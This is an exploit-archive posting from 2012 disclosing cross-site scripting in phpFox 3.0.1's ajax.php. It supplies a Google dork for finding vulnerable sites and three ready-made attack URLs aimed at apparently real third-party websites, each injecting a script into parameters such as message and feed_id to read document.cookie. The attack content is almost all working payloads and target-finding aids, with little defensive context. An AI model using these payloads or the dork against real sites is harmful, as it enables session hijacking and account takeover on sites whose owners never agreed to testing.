Home / exploits PhpFox 3.0.1 Cross Site Scripting
Posted on 05 September 2012
<!-- ________ .__ __________________ \_ ___ \_______|__| _____ \_____ \______ / /\_ __ |/ _(__ <| _/ \____| | / | Y Y / | \______ /|__| |__|__|_| /______ /____|_ / / / / / M3Mb3R OF AjaxTm --> # Exploit Title: phpFox Version 3.0.1 Cross site Scripting Vulnerability # # Google Dork: Intext:"Powered By phpFox Version 3.0.1" # # Date: 09/04/2012 # # Author: Crim3R & Ajax Security Team # # Home : Http://WwW.AjaxTm.com/ # # Vendor Home : http://www.phpfox.com/ # # Tested on: all # ================================== [+] There is a lots of parametrs Vulnerable to xss in ajax.php file like feed_id & message & title & ... D3m0: http://buddymahal.com//static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message="><script>alert(document.cookie);</script>&width=300 http://www.didarmasumane.tk//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id="><script>alert(document.cookie);</script>&item_id=518&_=1346525603467 http://www.didarmasumane.tk//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id=id&item_id=518"><script>alert(document.cookie);</script>&_=1346525603467 ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369
